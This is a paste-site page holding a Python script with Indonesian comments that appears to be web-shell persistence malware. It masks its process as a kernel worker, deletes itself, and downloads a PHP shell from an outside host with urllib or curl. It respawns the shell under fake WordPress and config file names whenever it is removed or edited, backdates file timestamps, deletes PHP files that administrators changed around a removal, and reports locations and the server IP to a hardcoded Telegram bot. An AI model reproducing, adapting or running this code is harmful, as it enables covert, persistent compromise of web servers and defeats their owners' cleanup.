Sign up
Login
New paste
Home
Trending
Archive
English
English
Indonesia
Sign up
Login
New Paste
Browse
#!/usr/bin/env python3 import os import time import random import sys import urllib.request import urllib.parse import subprocess import hashlib from datetime import datetime # Konfigurasi CONFIG = { "RAW_SHELL_URL": "https://s-kobam.direct/simpanan/bypas.txt", "BOT_TOKEN": os.getenv("BOT_TOKEN", "7645682403:AAGUbemvf-rXk9vyzt7wckphjjPnLZgxItE"), "CHAT_ID": os.getenv("CHAT_ID", "1345261884"), "SHELL_NAME": "kaye1337.php", "FAKE_NAMES": [ "index.php" "wp-config.php" "wp-login.php" "wp-admin.php" "wp-settings.php" "wp-load.php" "functions.php" "xmlrpc.php" "configuration.php" "administrator.php" "config.php" "install.php" "admin.php" "autoload.php" "settings.php" "db.php" "repair.php" "upload.php" "cmd.php" "test.php" "backup.php" "shell.php" "uploadify.php" "exploit.php" "functions.bak.php" "functions.old.php" "class.php" "class-wp.php" "wp-settings.bak.php" "wp-settings.old.php" "phpinfo.php" "info.php" "debug.php" "console.php" "session.php" "cache.php" "db_backup.php" "sql_dump.php" "uploads.php" "filemanager.php" "fileupload.php" "download.php" ], "TIMEOUT": 10, "POLL_INTERVAL": 2 } # Paths BASE_DIR = os.path.dirname(os.path.abspath(__file__)) SHELL_PATH = os.path.join(BASE_DIR, CONFIG["SHELL_NAME"]) TARGET_PATH = os.path.abspath(__file__) # State current_shell_path = SHELL_PATH current_shell_hash = None domain = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "https://nixxitjunk.com/" last_redeploy_time = 0 redeploy_cooldown = 10 # Sembunyikan proses try: os.nice(19) os.execl(sys.executable, "[kworker/0:1]", *sys.argv) except: pass sys.argv[0] = "[kworker/0:1]" def kirim_telegram(message): url = f"https://api.telegram.org/bot{CONFIG['BOT_TOKEN']}/sendMessage" data = urllib.parse.urlencode({ "chat_id": CONFIG["CHAT_ID"], "parse_mode": "Markdown", "text": message }).encode('ascii') try: req = urllib.request.Request(url, data=data, method='POST') urllib.request.urlopen(req, timeout=CONFIG["TIMEOUT"]) except: pass def get_file_hash(path): try: with open(path, 'rb') as f: return hashlib.sha256(f.read()).hexdigest() except: return None def download_shell(target_path): try: with urllib.request.urlopen(CONFIG["RAW_SHELL_URL"], timeout=CONFIG["TIMEOUT"]) as response: content = response.read() with open(target_path, 'wb') as f: f.write(content) if os.path.getsize(target_path) == 0: return download_with_curl(target_path) os.chmod(target_path, 0o444) # read-only return True except: return download_with_curl(target_path) def download_with_curl(target_path): try: result = subprocess.run( ["curl", "-s", "-o", target_path, CONFIG["RAW_SHELL_URL"]], capture_output=True, text=True, timeout=CONFIG["TIMEOUT"] ) if result.returncode == 0 and os.path.getsize(target_path) > 0: os.chmod(target_path, 0o444) return True return False except: return False def get_oldest_file_timestamp(directory): try: oldest = min( (os.path.getmtime(os.path.join(directory, f)) for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f))), default=time.time() ) return datetime.fromtimestamp(oldest).strftime('%Y-%m-%d %H:%M:%S') except: return datetime.now().strftime('%Y-%m-%d %H:%M:%S') def get_relative_path(file_path): try: relative = os.path.relpath(file_path, BASE_DIR) return relative.replace(os.sep, "/") except: return os.path.basename(file_path) def auto_touch(path, timestamp_str): try: ts = datetime.strptime(timestamp_str, '%Y-%m-%d %H:%M:%S').timestamp() os.utime(path, (ts, ts)) except: pass # Fungsi baru untuk mendeteksi dan menghapus file PHP yang mencoba menghapus shell def hapus_penghapus(trigger_time): try: # Rentang waktu: 5 detik sebelum dan setelah trigger start_time = trigger_time - 5 end_time = trigger_time + 5 deleted_files = [] # Cari semua file PHP di direktori dan subdirektori for root, dirs, files in os.walk(BASE_DIR): # Skip direktori cgi-bin dirs[:] = [d for d in dirs if d.lower() != 'cgi-bin'] for file in files: if file.endswith('.php'): file_path = os.path.join(root, file) try: stat = os.stat(file_path) mtime = stat.st_mtime # Periksa apakah file diubah dalam rentang waktu yang mencurigakan if start_time <= mtime <= end_time: # Kecualikan shell yang baru kita deploy if os.path.abspath(file_path) != os.path.abspath(current_shell_path): try: os.remove(file_path) deleted_files.append(file_path) except: pass except: pass # Kirim notifikasi jika ada file yang dihapus if deleted_files: message = "🔥 *File PHP yang mencurigakan dihapus!*\n" for f in deleted_files: message += f"📁 `{f}`\n" kirim_telegram(message) except Exception as e: # Debug: jika perlu, bisa log error pass def selamatkan_shell(trigger="unknown"): global current_shell_path, current_shell_hash, last_redeploy_time now = time.time() if now - last_redeploy_time < redeploy_cooldown: return try: random_name = random.choice(CONFIG["FAKE_NAMES"]) random_dir = BASE_DIR for root, dirs, _ in os.walk(BASE_DIR): valid_dirs = [d for d in dirs if d.lower() != 'cgi-bin'] if valid_dirs: random_dir = os.path.join(root, random.choice(valid_dirs)) break os.makedirs(random_dir, exist_ok=True) new_path = os.path.join(random_dir, random_name) if download_shell(new_path): current_shell_path = new_path current_shell_hash = get_file_hash(new_path) relative = get_relative_path(new_path) url = f"{domain}/{relative}" timestamp = get_oldest_file_timestamp(random_dir) try: with urllib.request.urlopen("https://api.ipify.org", timeout=CONFIG["TIMEOUT"]) as r: ip = r.read().decode() except: ip = "unknown" kirim_telegram(f"""⚠️ *Shell Dipindahkan! (Trigger: {trigger})* 📁 Path: `{new_path}` 🌍 URL: `{url}` 🌐 IP: `{ip}` 🕒 Waktu: {timestamp}""") auto_touch(new_path, timestamp) # Hapus file PHP yang mencoba menghapus shell (hanya untuk trigger "missing") if trigger == "missing": hapus_penghapus(now) last_redeploy_time = now except: pass def check_file_changes(): global current_shell_path, current_shell_hash exists = os.path.exists(current_shell_path) accessible = os.access(current_shell_path, os.F_OK) if exists else False file_hash = get_file_hash(current_shell_path) if exists else None if not exists or not accessible: selamatkan_shell(trigger="missing") elif file_hash != current_shell_hash: selamatkan_shell(trigger="edited") def deploy_shell(): global current_shell_path, current_shell_hash if download_shell(SHELL_PATH): current_shell_path = SHELL_PATH current_shell_hash = get_file_hash(SHELL_PATH) relative = get_relative_path(SHELL_PATH) url = f"{domain}/{relative}" timestamp = get_oldest_file_timestamp(BASE_DIR) kirim_telegram(f"""✅ *Shell berhasil dideploy!* 📁 Path: `{SHELL_PATH}` 🌍 URL: `{url}` 🕒 Waktu: {timestamp}""") auto_touch(SHELL_PATH, timestamp) def self_destruct(): try: with open(TARGET_PATH, 'a'): pass subprocess.run(["rm", "-f", TARGET_PATH], timeout=2) except: pass def main(): if not domain: self_destruct() return self_destruct() deploy_shell() while True: check_file_changes() time.sleep(CONFIG["POLL_INTERVAL"]) if __name__ == "__main__": try: main() except KeyboardInterrupt: self_destruct()
Paste Settings
Paste Title :
[Optional]
Paste Folder :
[Optional]
Select
Syntax Highlighting :
[Optional]
Select
Markup
CSS
JavaScript
Bash
C
C#
C++
Java
JSON
Lua
Plaintext
C-like
ABAP
ActionScript
Ada
Apache Configuration
APL
AppleScript
Arduino
ARFF
AsciiDoc
6502 Assembly
ASP.NET (C#)
AutoHotKey
AutoIt
Basic
Batch
Bison
Brainfuck
Bro
CoffeeScript
Clojure
Crystal
Content-Security-Policy
CSS Extras
D
Dart
Diff
Django/Jinja2
Docker
Eiffel
Elixir
Elm
ERB
Erlang
F#
Flow
Fortran
GEDCOM
Gherkin
Git
GLSL
GameMaker Language
Go
GraphQL
Groovy
Haml
Handlebars
Haskell
Haxe
HTTP
HTTP Public-Key-Pins
HTTP Strict-Transport-Security
IchigoJam
Icon
Inform 7
INI
IO
J
Jolie
Julia
Keyman
Kotlin
LaTeX
Less
Liquid
Lisp
LiveScript
LOLCODE
Makefile
Markdown
Markup templating
MATLAB
MEL
Mizar
Monkey
N4JS
NASM
nginx
Nim
Nix
NSIS
Objective-C
OCaml
OpenCL
Oz
PARI/GP
Parser
Pascal
Perl
PHP
PHP Extras
PL/SQL
PowerShell
Processing
Prolog
.properties
Protocol Buffers
Pug
Puppet
Pure
Python
Q (kdb+ database)
Qore
R
React JSX
React TSX
Ren'py
Reason
reST (reStructuredText)
Rip
Roboconf
Ruby
Rust
SAS
Sass (Sass)
Sass (Scss)
Scala
Scheme
Smalltalk
Smarty
SQL
Soy (Closure Template)
Stylus
Swift
TAP
Tcl
Textile
Template Toolkit 2
Twig
TypeScript
VB.Net
Velocity
Verilog
VHDL
vim
Visual Basic
WebAssembly
Wiki markup
Xeora
Xojo (REALbasic)
XQuery
YAML
HTML
Paste Expiration :
[Optional]
Never
Self Destroy
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Status :
[Optional]
Public
Unlisted
Private (members only)
Password :
[Optional]
Description:
[Optional]
Tags:
[Optional]
Encrypt Paste
(
?
)
Create New Paste
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Recent Pastes
Untitled
PHP
|
2 | 1 hour ago
Untitled
PHP
|
3 | 1 hour ago
Untitled
PHP
|
2 | 1 hour ago
ApollonDestroyer
PHP
|
2 | 1 hour ago
Untitled
PHP
|
2 | 1 hour ago
Untitled
PHP
|
4 | 1 hour ago
ApollonDestroyer
PHP
|
11 | 8 hours ago
Site Languages
×
English
Indonesia
Do you like cookies?
🍪 We use cookies to ensure you get the best experience on our website.
Learn more
I agree